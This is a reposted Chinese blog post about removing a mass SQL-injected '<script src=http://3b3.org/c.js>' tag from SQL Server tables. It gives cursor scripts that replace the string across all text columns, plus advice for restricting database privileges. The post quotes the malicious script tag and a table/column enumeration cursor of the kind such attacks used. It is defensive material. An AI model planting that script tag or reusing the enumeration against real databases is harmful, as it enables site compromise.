实战http://3b3.org/c.js恶意SQL注入[转贴]
来源:互联网 发布:js 大于等于0 编辑:程序博客网 时间:2024/05/20 13:36
如何最快速度删除?
" <script src=http://3b3.org/c.js> </script> "
---------------------------------------------------------------
进入SQL查询分析器
选择你的数据库
第一步:先sql表修改所有者为dbo
EXEC sp_MSforeachtable 'exec sp_changeobjectowner ' '? ' ', ' 'dbo ' ' '
第二步:统一删除字段被挂的js
declare @delStr nvarchar(500)
set @delStr= ' <script src=http://3b3.org/c.js> </script> '
set nocount on
declare @tableName nvarchar(100),@columnName nvarchar(100),@tbID int,@iRow int,@iResult int
declare @sql nvarchar(500)
set @iResult=0
declare cur cursor for
select name,id from sysobjects where xtype= 'U '
open cur
fetch next from cur into @tableName,@tbID
while @@fetch_status=0
begin
declare cur1 cursor for
--xtype in (231,167,239,175,35) 为char,varchar,nchar,nvarchar,text类型
select name from syscolumns where xtype in (231,167,239,175,35) and id=@tbID
open cur1
fetch next from cur1 into @columnName
while @@fetch_status=0
begin
set @sql= 'update [ ' + @tableName + '] set [ '+ @columnName + ']= replace([ '+@columnName+ '], ' ' '+@delStr+ ' ' ', ' ' ' ') where [ '+@columnName+ '] like ' '% '+@delStr+ '% ' ' '
exec sp_executesql @sql
set @iRow=@@rowcount
set @iResult=@iResult+@iRow
if @iRow> 0
begin
print '表: '+@tableName+ ',列: '+@columnName+ '被更新 '+convert(varchar(10),@iRow)+ '条记录; '
end
fetch next from cur1 into @columnName
end
close cur1
deallocate cur1
fetch next from cur into @tableName,@tbID
end
print '数据库共有 '+convert(varchar(10),@iResult)+ '条记录被更新!!! '
close cur
deallocate cur
set nocount off
---------------------------------------------------------------
彻底杜绝SQL注入
1.不要使用sa用户连接数据库
2、新建一个public权限数据库用户,并用这个用户访问数据库
3、[角色]去掉角色public对sysobjects与syscolumns对象的select访问权限
4、[用户]用户名称-> 右键-属性-权限-在sysobjects与syscolumns上面打“×”
5、通过以下代码检测(失败表示权限正确,如能显示出来则表明权限太高):
DECLARE @T varchar(255),
@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
Select a.name,b.name from sysobjects a,syscolumns b
where a.id=b.id and a.xtype= 'u ' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN print @c
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
---------------------------------------------------------------
让3b3.org c.js注入见鬼去吧!
http://topic.csdn.net/u/20090326/11/5e584897-2dd7-4e10-af1b-9b48b146af8e.html?seed=1427037238
declare @sql varchar(max)
set @sql='
declare @sql varchar(max)
set @sql=''update ? set ''
select @sql=@sql+name+''=replace(cast(''+name+'' as varchar(max)),''''<script src=http://3god.ne%54/c.js> </script>'''',''''''''),''
from syscolumns where id=object_id(''?'')
and xtype in (35,99,167,175,231,239)
set @sql=left(@sql,len(@sql)-1)+'' from ?''
exec(@sql)
'
exec sp_msforeachtable @sql
- 实战http://3b3.org/c.js恶意SQL注入
- 实战http://3b3.org/c.js恶意SQL注入
- 实战http://3b3.org/c.js恶意SQL注入
- 实战http://3b3.org/c.js恶意SQL注入[转贴]
- SQL2005防止http://3b3.org/c.js注入
- 解决“<script src=http://3b3.org/c.js> </script>”SQL注入方法
- 让3b3.org c.js注入见鬼去吧!
- 实战http3b3.orgc.js恶意SQL注入
- 成功解决script src=http://3b3.or/c.js的注入问题啊
- 如何防止sql恶意注入
- BMP图片中注入恶意JS代码
- 简单sql注入实战
- 图片攻击-BMP图片中注入恶意JS代码
- 警惕采用编码过的SQL恶意注入
- 清除SQL被注入恶意病毒代码的语句
- 清除SQL被注入恶意病毒代码 详细出处参考
- Cookie注入实战(非SQL注入)
- 记sql注入第一次实战
- 类似MSN弹出框的JavaScript代码
- Javascript 操作(新增、修改、删除、选中、清空、判断存在等)select控件
- 一个优秀股票交易手的定义
- 遍历文件夹下各个文件,然后读出每个文件的内容,并对内容进行过滤输出
- 什么是SCD?
- 实战http://3b3.org/c.js恶意SQL注入[转贴]
- 透析SCN号
- 评《Dreamweaver 正在死亡》
- 硬盘安装Linux操作系统
- Eclipse整合JBoss开发EJB3.0
- 建立合理的索引提高SQL Server的性能
- 关于ASSERT(断言)使用的规则--摘自《高质量C/C++编程指南》
- windows 2008 下 tomcat 与jdk 兼容问题
- 用户界面的今天和明天